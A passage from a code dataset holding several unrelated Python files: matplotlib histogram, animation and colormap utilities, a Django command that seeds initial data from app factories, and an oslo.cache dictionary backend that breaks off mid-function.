        ax.minorticks_on()
    # Marginal histogram along x (top panel).
    plot_histogram(
        values_x,
        fig=fig,
        ax=ax_hist_x,
        hist_scale=hist_x_scale,
        bin_weighted=False,
        divided_by_bin_size=hist_x_divided_by_bin_size,
        bins=bins_x,
        log_x=log_x,
        log_y=log_hist_x,
        vmin=vmin_x,
        vmax=vmax_x,
        plot_type=hist_x_plot_type,
        horizontal=False,
        color=hist_x_color,
        lw=hist_linewidth,
        ls="-",
        alpha=hist_x_alpha,
        fit_limits=hist_x_fit_limits,
        minorticks_on=minorticks_on,
        ylabel=hist_x_label,
        ylabel_color=hist_x_label_color,
        render_now=False,
    )
    # Marginal histogram along y (right panel, drawn horizontally).
    plot_histogram(
        values_y,
        fig=fig,
        ax=ax_hist_y,
        hist_scale=hist_y_scale,
        bin_weighted=False,
        divided_by_bin_size=hist_y_divided_by_bin_size,
        bins=bins_y,
        log_x=log_hist_y,
        log_y=log_y,
        vmin=vmin_y,
        vmax=vmax_y,
        plot_type=hist_y_plot_type,
        horizontal=True,
        color=hist_y_color,
        lw=hist_linewidth,
        ls="-",
        alpha=hist_y_alpha,
        fit_limits=hist_y_fit_limits,
        minorticks_on=minorticks_on,
        xlabel=hist_y_label,
        xlabel_color=hist_y_label_color,
        render_now=False,
    )
    set_2d_axis_labels(ax, xlabel, ylabel)
    if render_now:
        render(fig, output_path=output_path)
    return fig, ax, ax_hist_x, ax_hist_y
def compute_coord_lims(coords, log=False, pad=0.05):
    """Return padded (lower, upper) axis limits covering *coords*.

    With ``log=True`` only the positive values are considered and the
    padding is applied in log10 space; the lower limit is clipped at zero.
    NaN values are ignored in either mode.
    """
    if log:
        positive = coords[coords > 0]
        log_lo = np.log10(np.nanmin(positive))
        log_hi = np.log10(np.nanmax(positive))
        margin = pad * (log_hi - log_lo)
        return max(0, 10 ** (log_lo - margin)), 10 ** (log_hi + margin)
    lo = np.nanmin(coords)
    hi = np.nanmax(coords)
    margin = pad * (hi - lo)
    return lo - margin, hi + margin
def setup_line_animation(
    get_updated_coordinates,
    fig=None,
    ax=None,
    log_x=False,
    log_y=False,
    x_lims=None,
    y_lims=None,
    invert_xaxis=False,
    invert_yaxis=False,
    ds="default",
    ls="-",
    lw=1.0,
    color="k",
    marker=None,
    alpha=1.0,
    minorticks_on=True,
    xlabel=None,
    ylabel=None,
    label=None,
    legend_loc=None,
    legend_fontsize=None,
    extra_artists=None,
    extra_patches=None,
    show_frame_label=False,
    frame_label_fontsize="small",
    frame_label_color="k",
    fig_kwargs={},
):
    """Prepare a line-plot animation driven by ``get_updated_coordinates``.

    ``get_updated_coordinates(frame)`` must return a tuple whose first
    element is an (x, y) coordinate pair for ``Line2D.set_data``; when
    ``show_frame_label`` is True the next element is the frame label text.

    Returns ``(fig, ax, init, update)`` suitable for ``animate()`` /
    ``matplotlib.animation.FuncAnimation``.
    """
    if fig is None or ax is None:
        fig, ax = create_2d_subplots(**fig_kwargs)
    # Empty line artist; data is supplied by update() each frame.
    (line,) = ax.plot(
        [],
        [],
        ds=ds,
        ls=ls,
        lw=lw,
        marker=marker,
        color=color,
        alpha=alpha,
        label=label,
    )
    # Optional frame label in the upper-left corner of the axes.
    text = (
        ax.text(
            0.01,
            0.99,
            "",
            transform=ax.transAxes,
            ha="left",
            va="top",
            fontsize=frame_label_fontsize,
            color=frame_label_color,
        )
        if show_frame_label
        else None
    )
    if extra_artists is not None:
        for artist in extra_artists:
            ax.add_artist(artist)
    if extra_patches is not None:
        for patch in extra_patches:
            ax.add_patch(patch)
    if log_x:
        ax.set_xscale("log")
    if log_y:
        ax.set_yscale("log")
    set_2d_plot_extent(ax, x_lims, y_lims)
    set_2d_axis_labels(ax, xlabel, ylabel)
    if minorticks_on:
        ax.minorticks_on()
    if invert_xaxis:
        ax.invert_xaxis()
    if invert_yaxis:
        ax.invert_yaxis()
    if legend_loc is not None:
        ax.legend(loc=legend_loc, fontsize=legend_fontsize)
    init = lambda: (line, *(() if text is None else (text,)))
    def update(frame):
        # Pull the new data for this frame and return the changed artists
        # (blitting-friendly).
        result = get_updated_coordinates(frame)
        assert isinstance(result, tuple)
        result = list(result)
        coordinates = result.pop(0)
        line.set_data(*coordinates)
        ret = (line,)
        if show_frame_label:
            frame_label = result.pop(0)
            text.set_text(frame_label)
            ret += (text,)
        # Autoscale per frame when no fixed limits were given.
        if x_lims is None:
            ax.set_xlim(*compute_coord_lims(coordinates[0], log=log_x))
        if y_lims is None:
            ax.set_ylim(*compute_coord_lims(coordinates[1], log=log_y))
        return ret
    return fig, ax, init, update
def setup_scatter_animation(
    get_updated_coordinates,
    fig=None,
    ax=None,
    log_x=False,
    log_y=False,
    x_lims=None,
    y_lims=None,
    invert_xaxis=False,
    invert_yaxis=False,
    marker="o",
    s=1.0,
    c="k",
    edgecolors="none",
    alpha=1.0,
    minorticks_on=True,
    xlabel=None,
    ylabel=None,
    label=None,
    legend_loc=None,
    show_frame_label=False,
    frame_label_fontsize="small",
    frame_label_color="k",
    fig_kwargs={},
):
    """Prepare a 2D scatter animation driven by ``get_updated_coordinates``.

    ``get_updated_coordinates(frame)`` must return a tuple whose first
    element is the new offsets (passed to ``PathCollection.set_offsets``);
    when ``show_frame_label`` is True the next element is the frame label.

    Returns ``(fig, ax, init, update)`` suitable for ``animate()``.
    """
    if fig is None or ax is None:
        fig, ax = create_2d_subplots(**fig_kwargs)
    # Empty scatter artist; offsets are supplied by update() each frame.
    sc = ax.scatter(
        [], [], marker=marker, s=s, c=c, edgecolors=edgecolors, alpha=alpha, label=label
    )
    # Optional frame label in the upper-left corner of the axes.
    text = (
        ax.text(
            0.01,
            0.99,
            "",
            transform=ax.transAxes,
            ha="left",
            va="top",
            fontsize=frame_label_fontsize,
            color=frame_label_color,
        )
        if show_frame_label
        else None
    )
    if log_x:
        ax.set_xscale("log")
    if log_y:
        ax.set_yscale("log")
    set_2d_plot_extent(ax, x_lims, y_lims)
    set_2d_axis_labels(ax, xlabel, ylabel)
    if minorticks_on:
        ax.minorticks_on()
    if invert_xaxis:
        ax.invert_xaxis()
    if invert_yaxis:
        ax.invert_yaxis()
    if legend_loc is not None:
        ax.legend(loc=legend_loc)
    init = lambda: (sc, *(() if text is None else (text,)))
    def update(frame):
        # Pull the new data for this frame and return the changed artists.
        result = get_updated_coordinates(frame)
        assert isinstance(result, tuple)
        result = list(result)
        coordinates = result.pop(0)
        sc.set_offsets(coordinates)
        ret = (sc,)
        if show_frame_label:
            frame_label = result.pop(0)
            text.set_text(frame_label)
            ret += (text,)
        # Autoscale per frame when no fixed limits were given.
        if x_lims is None:
            ax.set_xlim(*compute_coord_lims(coordinates[0], log=log_x))
        if y_lims is None:
            ax.set_ylim(*compute_coord_lims(coordinates[1], log=log_y))
        return ret
    return fig, ax, init, update
def setup_2d_field_animation(
    hor_coords,
    vert_coords,
    get_updated_values,
    fig=None,
    ax=None,
    minorticks_on=True,
    vmin=None,
    vmax=None,
    symmetric_clims=False,
    log=False,
    symlog=False,
    linthresh=np.inf,
    linscale=1.0,
    alpha=1.0,
    cmap_name="viridis",
    cmap_bad_color="white",
    cbar_loc="right",
    cbar_pad=0.05,
    cbar_minorticks_on=False,
    cbar_opposite_side_ticks=False,
    xlabel=None,
    ylabel=None,
    clabel="",
    show_frame_label=False,
    frame_label_fontsize="small",
    frame_label_color="k",
    frame_label_outline_color="white",
    use_varying_alpha=False,
    title=None,
    rasterized=None,
    extra_artists=[],
    fig_kwargs=dict(width=7.2, aspect_ratio=5.0 / 4.0),
    picker=None,
):
    """Prepare a pcolormesh animation of a 2D field on a fixed grid.

    ``get_updated_values(frame)`` must return a tuple whose first element is
    the 2D value array (transposed and raveled before display), optionally
    followed by an alpha array (when ``use_varying_alpha``) and a frame
    label (when ``show_frame_label``).

    Returns ``(fig, ax, init, update)`` suitable for ``animate()``.

    NOTE(review): ``extra_artists=[]`` and ``fig_kwargs=dict(...)`` are
    mutable default arguments; they are never mutated here, but this is
    fragile if the function body is ever changed to modify them.
    """
    if fig is None or ax is None:
        fig, ax = create_2d_subplots(**fig_kwargs)
    if symlog:
        norm = get_symlog_normalizer(vmin, vmax, linthresh, linscale=linscale)
    else:
        norm = get_normalizer(vmin, vmax, log=log)
    cmap = get_cmap(cmap_name, bad_color=cmap_bad_color)
    # pcolormesh needs N+1 edges per axis: extend each coordinate array by
    # one element, repeating the last grid spacing.
    lower_edges_hor = np.empty(hor_coords.size + 1, dtype=hor_coords.dtype)
    lower_edges_vert = np.empty(vert_coords.size + 1, dtype=vert_coords.dtype)
    lower_edges_hor[:-1] = hor_coords
    lower_edges_vert[:-1] = vert_coords
    lower_edges_hor[-1] = hor_coords[-1] + (hor_coords[-1] - hor_coords[-2])
    lower_edges_vert[-1] = vert_coords[-1] + (vert_coords[-1] - vert_coords[-2])
    # Placeholder data (ones); real values are supplied by update().
    mesh = ax.pcolormesh(
        *np.meshgrid(lower_edges_hor, lower_edges_vert),
        np.ones((len(vert_coords), len(hor_coords))),
        shading="auto",
        norm=norm,
        cmap=cmap,
        alpha=alpha,
        rasterized=rasterized,
        picker=picker,
    )
    if show_frame_label:
        text = ax.text(
            0.01,
            0.99,
            "",
            transform=ax.transAxes,
            ha="left",
            va="top",
            fontsize=frame_label_fontsize,
            color=frame_label_color,
        )
        if frame_label_outline_color is not None:
            # Outline the label so it stays readable over varying backgrounds.
            text.set_path_effects(
                [
                    path_effects.Stroke(
                        linewidth=0.5, foreground=frame_label_outline_color
                    ),
                    path_effects.Normal(),
                ]
            )
    else:
        text = None
    set_2d_plot_extent(
        ax, (hor_coords[0], hor_coords[-1]), (vert_coords[0], vert_coords[-1])
    )
    set_2d_axis_labels(ax, xlabel, ylabel)
    if cbar_loc is not None:
        add_2d_colorbar(
            fig,
            ax,
            mesh,
            loc=cbar_loc,
            pad=cbar_pad,
            minorticks_on=cbar_minorticks_on,
            opposite_side_ticks=cbar_opposite_side_ticks,
            label=clabel,
        )
    if extra_artists is not None:
        for artist in extra_artists:
            ax.add_artist(artist)
    if minorticks_on:
        ax.minorticks_on()
    ax.set_aspect("equal")
    if title is not None:
        ax.set_title(title)
    init = lambda: (mesh, *(() if text is None else (text,)))
    def update(frame):
        # Pull the new field values for this frame and update the mesh.
        result = get_updated_values(frame)
        assert isinstance(result, tuple)
        result = list(result)
        values = result.pop(0)
        mesh.update({"array": values.T.ravel()})
        ret = (mesh,)
        if use_varying_alpha:
            # Per-cell alpha: draw first so facecolors exist, then patch
            # their alpha channel in place.
            alphas = result.pop(0)
            fig.canvas.draw()
            mesh.get_facecolors()[:, 3] = alphas.T.ravel()
        if show_frame_label:
            frame_label = result.pop(0)
            text.set_text(frame_label)
            ret += (text,)
        if vmin is None and vmax is None:
            # Autoscale the color limits from the current frame (positive
            # values only in log mode).
            v = values[values > 0] if log else values
            new_vmin = np.nanmin(v)
            new_vmax = np.nanmax(v)
            if symmetric_clims:
                new_vmax = max(abs(new_vmin), abs(new_vmax))
                new_vmin = -new_vmax
            mesh.set_clim(new_vmin, new_vmax)
        return ret
    return fig, ax, init, update
def setup_3d_scatter_animation(
    fig,
    ax,
    get_updated_data,
    initial_coordinates=None,
    initial_colors=None,
    x_lims=None,
    y_lims=None,
    z_lims=None,
    axes_equal=True,
    invert_xaxis=False,
    invert_yaxis=False,
    invert_zaxis=False,
    marker="o",
    s=1.0,
    edgecolors="none",
    xlabel=None,
    ylabel=None,
    zlabel=None,
    show_frame_label=False,
):
    """Prepare a 3D scatter animation on an existing 3D axes.

    ``get_updated_data(frame)`` must return a tuple
    ``(frame_label, coordinates, colors)`` where ``colors`` may be None to
    keep the current colors.

    Returns ``(init, update)`` suitable for ``animate()``.

    NOTE(review): writes the private Axes3D attributes ``_offsets3d`` and
    ``_facecolor3d`` directly, which depends on matplotlib internals and may
    break across matplotlib versions.
    """
    sc = ax.scatter(
        [], [], [], marker=marker, s=s, edgecolors=edgecolors, depthshade=False
    )
    # Optional frame label anchored in 2D axes coordinates.
    text = (
        ax.text2D(0.01, 0.99, "", transform=ax.transAxes, ha="left", va="top")
        if show_frame_label
        else None
    )
    set_3d_plot_extent(ax, x_lims, y_lims, z_lims, axes_equal=axes_equal)
    set_3d_axis_labels(ax, xlabel, ylabel, zlabel)
    if invert_xaxis:
        ax.invert_xaxis()
    if invert_yaxis:
        ax.invert_yaxis()
    if invert_zaxis:
        ax.invert_zaxis()
    def init():
        # Seed the scatter with optional initial coordinates/colors.
        if initial_coordinates is not None:
            sc._offsets3d = initial_coordinates
        if initial_colors is not None:
            sc.set_color(initial_colors)
            sc._facecolor3d = sc.get_facecolor()
        return (sc, *(() if text is None else (text,)))
    def update(frame):
        frame_label, coordinates, colors = get_updated_data(frame)
        sc._offsets3d = coordinates
        if colors is not None:
            sc.set_color(colors)
            sc._facecolor3d = sc.get_facecolor()
        if text is None:
            return (sc,)
        else:
            text.set_text(frame_label)
            return (sc, text)
    return init, update
def animate(
    fig,
    init_func,
    update_func,
    blit=False,
    fps=30.0,
    video_duration=None,
    n_frames=None,
    tight_layout=False,
    writer="ffmpeg",
    codec="h264",
    dpi=None,
    bitrate=None,
    output_path=None,
):
    """Run (or save) a FuncAnimation built from ``init_func``/``update_func``.

    If ``video_duration`` (seconds) is given it overrides ``n_frames``.
    With no ``output_path`` the animation is shown interactively; otherwise
    it is saved, which requires a finite number of frames.
    """
    interval = 1e3 / fps  # frame interval in milliseconds
    n_frames = n_frames if video_duration is None else int(video_duration * fps)
    anim = animation.FuncAnimation(
        fig,
        update_func,
        init_func=init_func,
        frames=n_frames,
        blit=blit,
        interval=interval,
    )
    if tight_layout:
        fig.tight_layout()
    if output_path is None:
        plt.show()
    else:
        # Saving requires a known frame count to terminate.
        assert n_frames is not None
        anim.save(
            output_path,
            writer=writer,
            codec=codec,
            dpi=dpi,
            bitrate=bitrate,
            fps=fps,
            progress_callback=lambda i, n: print(
                "Animation progress: {:4.1f}%".format(i * 100.0 / n), end="\r"
            ),
        )
def compute_histogram(
    values,
    weights=None,
    bins="auto",
    vmin=None,
    vmax=None,
    decide_bins_in_log_space=False,
    linthresh=None,
    weighted_average=False,
    min_n_values=None,
    density=False,
):
    """Compute a (possibly weighted) 1D histogram of *values*.

    Binning is performed in normalized space: linear by default, log10 when
    ``decide_bins_in_log_space`` is set, and symlog when ``linthresh`` is
    also given. With ``weighted_average`` the weighted sums are divided by
    the per-bin counts, and bins with fewer than ``min_n_values`` entries
    are set to NaN. Returns ``(hist, bin_edges, bin_centers)`` with edges
    and centers mapped back to the original value space.
    """
    lower = np.nanmin(values) if vmin is None else vmin
    upper = np.nanmax(values) if vmax is None else vmax
    if isinstance(bins, list):
        bins = np.array(bins)
    # Pick the normalizer defining the space in which bins are equidistant.
    if not decide_bins_in_log_space:
        normalizer = get_linear_normalizer(lower, upper)
    elif linthresh is None:
        normalizer = get_log_normalizer(lower, upper)
    else:
        normalizer = get_symlog_normalizer(lower, upper, linthresh=linthresh)
    # Transform the data, the range and any explicit bin edges.
    values = normalizer(values)
    lower = normalizer(lower)
    upper = normalizer(upper)
    if isinstance(bins, np.ndarray):
        bins = normalizer(bins)
    hist, bin_edges = np.histogram(
        values, bins=bins, range=(lower, upper), weights=weights, density=density
    )
    if weighted_average and weights is not None:
        # Convert weighted sums into per-bin averages.
        counts, _ = np.histogram(values, bins=bin_edges, range=(lower, upper))
        hist /= counts
        if min_n_values is not None:
            hist[counts < min_n_values] = np.nan
    bin_centers = 0.5 * (bin_edges[:-1] + bin_edges[1:])
    return hist, normalizer.inverse(bin_edges), normalizer.inverse(bin_centers)
def compute_histogram_difference(
    values, weights, vmin, vmax, bins, decide_bins_in_log_space
):
    """Histogram difference (left minus right) of two value sets on shared bins.

    *values* and *weights* are (left, right) pairs. The bin range covers
    both sets unless ``vmin``/``vmax`` override it; with
    ``decide_bins_in_log_space`` binning happens in log10 space and the
    returned edges/centers are mapped back to linear space.

    Returns ``(left_hist - right_hist, bin_edges, bin_centers)``.
    """
    values_a, values_b = values
    weights_a, weights_b = weights
    lower = min(np.nanmin(values_a), np.nanmin(values_b)) if vmin is None else vmin
    upper = max(np.nanmax(values_a), np.nanmax(values_b)) if vmax is None else vmax
    if decide_bins_in_log_space:
        values_a = np.log10(values_a)
        values_b = np.log10(values_b)
        lower = np.log10(lower)
        upper = np.log10(upper)
    hist_a, bin_edges = np.histogram(
        values_a, bins=bins, range=(lower, upper), weights=weights_a
    )
    # Reuse the left histogram's edges so both are binned identically.
    hist_b, _ = np.histogram(
        values_b, bins=bin_edges, range=(lower, upper), weights=weights_b
    )
    bin_centers = 0.5 * (bin_edges[:-1] + bin_edges[1:])
    if decide_bins_in_log_space:
        bin_edges = 10**bin_edges
        bin_centers = 10**bin_centers
    return hist_a - hist_b, bin_edges, bin_centers
def compute_2d_histogram(
    values_x,
    values_y,
    weights,
    vmin_x,
    vmax_x,
    vmin_y,
    vmax_y,
    log_x,
    log_y,
    bins_x,
    bins_y,
    weighted_average,
):
    """Compute a (possibly weighted) 2D histogram of (values_x, values_y).

    Each axis range defaults to the data's nanmin/nanmax and can be
    overridden with vmin/vmax; with ``log_x``/``log_y`` binning happens in
    log10 space (the returned edges are then in log10 space as well).
    With ``weighted_average`` the weighted sums are divided by the per-bin
    counts (bins without entries become NaN via 0/0).

    Returns ``(hist, bin_edges_x, bin_edges_y)``.

    Note: the original implementation re-checked ``vmin_* > min_value_*``
    after the defaults were applied; those comparisons could never be true
    (the limit had just been set equal to the override) and were removed.
    """
    min_value_x = np.nanmin(values_x) if vmin_x is None else vmin_x
    max_value_x = np.nanmax(values_x) if vmax_x is None else vmax_x
    min_value_y = np.nanmin(values_y) if vmin_y is None else vmin_y
    max_value_y = np.nanmax(values_y) if vmax_y is None else vmax_y
    if log_x:
        values_x = np.log10(values_x)
        min_value_x = np.log10(min_value_x)
        max_value_x = np.log10(max_value_x)
    if log_y:
        values_y = np.log10(values_y)
        min_value_y = np.log10(min_value_y)
        max_value_y = np.log10(max_value_y)
    hist, bin_edges_x, bin_edges_y = np.histogram2d(
        values_x,
        values_y,
        bins=[bins_x, bins_y],
        range=[[min_value_x, max_value_x], [min_value_y, max_value_y]],
        weights=weights,
    )
    if weights is not None and weighted_average:
        # Convert weighted sums into per-bin averages using the same edges.
        unweighted_hist, _, _ = np.histogram2d(
            values_x,
            values_y,
            bins=[bin_edges_x, bin_edges_y],
            range=[[min_value_x, max_value_x], [min_value_y, max_value_y]],
        )
        hist /= unweighted_hist
    return hist, bin_edges_x, bin_edges_y
def compute_2d_histogram_difference(
    values_x,
    values_y,
    weights,
    vmin_x,
    vmax_x,
    vmin_y,
    vmax_y,
    log_x,
    log_y,
    bins_x,
    bins_y,
):
    """Difference (left minus right) of two 2D histograms on identical bins.

    *values_x*, *values_y* and *weights* are (left, right) pairs; both
    histograms are computed with ``compute_2d_histogram`` using the same
    limits, log flags and bin counts (never weighted-average).

    Returns ``(left_hist - right_hist, bin_edges_x, bin_edges_y)``.
    """
    values_x_a, values_x_b = values_x
    values_y_a, values_y_b = values_y
    weights_a, weights_b = weights
    # Shared trailing arguments so both histograms are binned identically.
    shared_args = (vmin_x, vmax_x, vmin_y, vmax_y, log_x, log_y, bins_x, bins_y, False)
    hist_a, bin_edges_x, bin_edges_y = compute_2d_histogram(
        values_x_a, values_y_a, weights_a, *shared_args
    )
    hist_b, _, _ = compute_2d_histogram(
        values_x_b, values_y_b, weights_b, *shared_args
    )
    return hist_a - hist_b, bin_edges_x, bin_edges_y
# Custom colormaps keyed by name. The first three are stitched from the
# matplotlib "Blues"/"Oranges" maps with white inserted at the seam(s); the
# remainder are small hand-picked hex palettes interpolated linearly.
CUSTOM_COLORMAPS = {
    "transport": define_linear_segmented_colormap(
        "",
        np.vstack(
            (
                plt.get_cmap("Blues")(np.linspace(1, 0, 256)),
                [[1.0, 1.0, 1.0, 1.0]],
                plt.get_cmap("Oranges")(np.linspace(0, 1, 256)),
            )
        ),
        bad_color="white",
        N=513,
    ),
    "transport_inv": define_linear_segmented_colormap(
        "",
        np.vstack(
            (
                [[1.0, 1.0, 1.0, 1.0]],
                plt.get_cmap("Blues_r")(np.linspace(1, 0, 256)),
                plt.get_cmap("Oranges_r")(np.linspace(0, 1, 256)),
                [[1.0, 1.0, 1.0, 1.0]],
            )
        ),
        bad_color="white",
        N=514,
    ),
    "Orangesw_r": define_linear_segmented_colormap(
        "",
        np.vstack(
            (plt.get_cmap("Oranges_r")(np.linspace(0, 1, 256)), [[1.0, 1.0, 1.0, 1.0]])
        ),
        bad_color="white",
        N=257,
    ),
    "afternoon": define_linear_segmented_colormap(
        "", ["#8C0004", "#C8000A", "#E8A735", "#E2C499"]
    ),
    "timeless": define_linear_segmented_colormap(
        "", ["#16253D", "#002C54", "#EFB509", "#CD7213"]
    ),
    "arctic": define_linear_segmented_colormap(
        "", ["#006C84", "#6EB5C0", "#E2E8E4", "#FFCCBB"]
    ),
    "sunkissed": define_linear_segmented_colormap(
        "", ["#D24136", "#EB8A3E", "#EBB582", "#785A46"]
    ),
    "berry": define_linear_segmented_colormap(
        "", ["#D0E1F9", "#4D648D", "#283655", "#1E1F26"]
    ),
    "sunset": define_linear_segmented_colormap(
        "", ["#363237", "#2D4262", "#73605B", "#D09683"]
    ),
    "watery": define_linear_segmented_colormap(
        "", ["#021C1E", "#004445", "#2C7873", "#6FB98F"]
    ),
    "bright": define_linear_segmented_colormap(
        "", ["#061283", "#FD3C3C", "#FFB74C", "#138D90"]
    ),
    "school": define_linear_segmented_colormap(
        "", ["#81715E", "#FAAE3D", "#E38533", "#E4535E"]
    ),
    "golden": define_linear_segmented_colormap(
        "", ["#323030", "#CDBEA7", "#C29545", "#882426"]
    ),
    "misty": define_linear_segmented_colormap(
        "", ["#04202C", "#2C493F", "#5B7065", "#C9D1C8"]
    ),
    "coolblues": define_linear_segmented_colormap(
        "", ["#003B46", "#07575B", "#66A5AD", "#C4DFE6"]
    ),
    "candy": define_linear_segmented_colormap(
        "", ["#AD1457", "#D81B60", "#FFA000", "#FDD835", "#FFEE58"]
    ),
}
# Color cycle of hex RGB strings ("CB" presumably stands for
# colorblind-friendly — verify before relying on it for accessibility).
CB_COLOR_CYCLE = [
    "#dc143c",
    "#377eb8",
    "#ff7f00",
    "#4daf4a",
    "#984ea3",
    "#a65628",
    "#f781bf",
    "#999999",
    "#dede00",
]
| 25.879798 | 88 | 0.581944 | 395 | 0.007709 | 0 | 0 | 0 | 0 | 0 | 0 | 2,278 | 0.044456 |
352ac045aca6f34db9114bf0106c20cfc01aaf2f | 4,174 | py | Python | cms/management/commands/create_initial_data.py | dcreekp/pythondotorg | 56b8707bcb6121d636177ad69b9d345c307405be | [
"Apache-2.0"
] | 1 | 2018-07-30T07:32:26.000Z | 2018-07-30T07:32:26.000Z | cms/management/commands/create_initial_data.py | Nathanator/pythondotorg | 694f2e0afcd8f8c4882f9f3ae0a74f2d95dfcd18 | [
"Apache-2.0"
] | null | null | null | cms/management/commands/create_initial_data.py | Nathanator/pythondotorg | 694f2e0afcd8f8c4882f9f3ae0a74f2d95dfcd18 | [
"Apache-2.0"
] | null | null | null | import importlib
import inspect
import pprint
from django.apps import apps
from django.core.management import BaseCommand, call_command
class Command(BaseCommand):
    """Management command that populates the database via app factories.

    For each installed app (or a single app given via --app-label), imports
    ``<app>.factories`` and calls its ``initial_data`` function if present.
    """
    help = 'Create initial data by using factories.'
    def add_arguments(self, parser):
        """Register the --app-label and --flush command-line options."""
        parser.add_argument(
            '--app-label',
            dest='app_label',
            help='Provide an app label to create app specific data (e.g. --app-label boxes)',
        )
        parser.add_argument(
            '--flush',
            action='store_true',
            dest='do_flush',
            help='Remove existing data in the database before creating new data.',
        )
    def collect_initial_data_functions(self, app_label):
        """Collect ``initial_data`` functions from ``<app>.factories`` modules.

        Returns a dict mapping app name to function. Returns None (after
        printing an error) when the given app_label does not exist.
        """
        functions = {}
        if app_label:
            try:
                app_list = [apps.get_app_config(app_label)]
            except LookupError:
                self.stdout.write(self.style.ERROR('The app label provided does not exist as an application.'))
                return
        else:
            app_list = apps.get_app_configs()
        for app in app_list:
            try:
                factory_module = importlib.import_module('{}.factories'.format(app.name))
            except ImportError:
                # App has no factories module; skip it.
                continue
            else:
                for name, function in inspect.getmembers(factory_module, inspect.isfunction):
                    if name == 'initial_data':
                        functions[app.name] = function
                        break
        return functions
    def output(self, app_name, verbosity, *, done=False, result=False):
        """Write per-app progress messages, honoring the verbosity level."""
        if verbosity > 0:
            if done:
                self.stdout.write(self.style.SUCCESS('DONE'))
            else:
                self.stdout.write('Creating initial data for {!r}... '.format(app_name), ending='')
        if verbosity >= 2 and result:
            pprint.pprint(result)
    def flush_handler(self, do_flush, verbosity):
        """Ask for confirmation and, with --flush, flush the database.

        Returns the raw confirmation string the user typed.
        """
        if do_flush:
            msg = (
                'You have provided the --flush argument, this will cleanup '
                'the database before creating new data.\n'
                'Type \'y\' or \'yes\' to continue, \'n\' or \'no\' to cancel: '
            )
        else:
            msg = (
                'Note that this command won\'t cleanup the database before '
                'creating new data.\n'
                'If you would like to cleanup the database before creating '
                'new data, call create_initial_data with --flush.\n'
                'Type \'y\' or \'yes\' to continue, \'n\' or \'no\' to cancel: '
            )
        confirm = input(self.style.WARNING(msg))
        if do_flush and confirm in ('y', 'yes'):
            try:
                call_command('flush', verbosity=verbosity, interactive=False)
            except Exception as exc:
                self.stdout.write(self.style.ERROR('{}: {}'.format(type(exc).__name__, exc)))
        return confirm
    def handle(self, **options):
        """Entry point: confirm, collect initial_data functions, run them."""
        verbosity = options['verbosity']
        app_label = options['app_label']
        do_flush = options['do_flush']
        confirm = self.flush_handler(do_flush, verbosity)
        if confirm not in ('y', 'yes'):
            return
        # Collect relevant functions for data generation.
        functions = self.collect_initial_data_functions(app_label)
        if not functions:
            return
        if not app_label:
            # Load the sitetree menu fixture once when running for all apps.
            self.output('sitetree', verbosity)
            try:
                call_command('loaddata', 'sitetree_menus', '-v0')
            except Exception as exc:
                self.stdout.write(self.style.ERROR('{}: {}'.format(type(exc).__name__, exc)))
            else:
                self.output('sitetree', verbosity, done=True)
        for app_name, function in functions.items():
            self.output(app_name, verbosity)
            try:
                result = function()
            except Exception as exc:
                # Report the failure but keep processing the remaining apps.
                self.stdout.write(self.style.ERROR('{}: {}'.format(type(exc).__name__, exc)))
                continue
            else:
                self.output(app_name, verbosity, done=True, result=result)
| 37.603604 | 111 | 0.551509 | 4,034 | 0.966459 | 0 | 0 | 0 | 0 | 0 | 0 | 968 | 0.231912 |
352b63d351b0fa1ec394f4c8e0212687ff1e36ed | 3,290 | py | Python | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | 29 | 2015-04-26T16:05:14.000Z | 2021-12-31T15:03:19.000Z | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | null | null | null | oslo_cache/backends/dictionary.py | mail2nsrajesh/oslo.cache | f288eae21f625b9bb5063f525fcc18014848a64f | [
"Apache-2.0"
] | 19 | 2015-06-15T23:51:10.000Z | 2020-12-10T00:03:21.000Z | # Copyright 2015 Mirantis Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""dogpile.cache backend that uses dictionary for storage"""
from dogpile.cache import api
from oslo_cache import core
from oslo_utils import timeutils
# Public API of this module.
__all__ = [
    'DictCacheBackend'
]
# Sentinel dogpile uses for "no cached value"; aliased locally for brevity.
_NO_VALUE = core.NO_VALUE
class DictCacheBackend(api.CacheBackend):
    """A dogpile.cache backend storing entries in a plain in-memory dict.

    Arguments accepted in the arguments dictionary:

    :param expiration_time: interval in seconds to indicate maximum
        time-to-live value for each key in DictCacheBackend.
        Default expiration_time value is 0, that means that all keys have
        infinite time-to-live value.
    :type expiration_time: real
    """
    def __init__(self, arguments):
        self.expiration_time = arguments.get('expiration_time', 0)
        self.cache = {}
    def _deadline(self):
        # Absolute expiry timestamp for entries stored now (0 means never).
        if self.expiration_time > 0:
            return timeutils.utcnow_ts() + self.expiration_time
        return 0
    def get(self, key):
        """Retrieve the value for a key.

        :param key: dictionary key
        :returns: value for a key or :data:`oslo_cache.core.NO_VALUE`
            for nonexistent or expired keys.
        """
        value, deadline = self.cache.get(key, (_NO_VALUE, 0))
        if self.expiration_time > 0 and timeutils.utcnow_ts() >= deadline:
            # Entry (if any) has expired; drop it lazily on access.
            self.cache.pop(key, None)
            return _NO_VALUE
        return value
    def get_multi(self, keys):
        """Retrieve the values for a list of keys."""
        return list(map(self.get, keys))
    def set(self, key, value):
        """Set the value for a key.

        Expunges expired keys during each set.

        :param key: dictionary key
        :param value: value associated with the key
        """
        self.set_multi({key: value})
    def set_multi(self, mapping):
        """Set multiple values in the cache.

        Expunges expired keys during each set.

        :param mapping: dictionary with key/value pairs
        """
        self._clear()
        deadline = self._deadline()
        for key, value in mapping.items():
            self.cache[key] = (value, deadline)
    def delete(self, key):
        """Delete the value associated with the key if it exists.

        :param key: dictionary key
        """
        self.cache.pop(key, None)
    def delete_multi(self, keys):
        """Delete the value associated with each key in the list if it exists.

        :param keys: list of dictionary keys
        """
        for key in keys:
            self.delete(key)
    def _clear(self):
        """Expunge expired keys."""
        now = timeutils.utcnow_ts()
        stale = [
            key
            for key, (_value, deadline) in self.cache.items()
            if 0 < deadline <= now
        ]
        for key in stale:
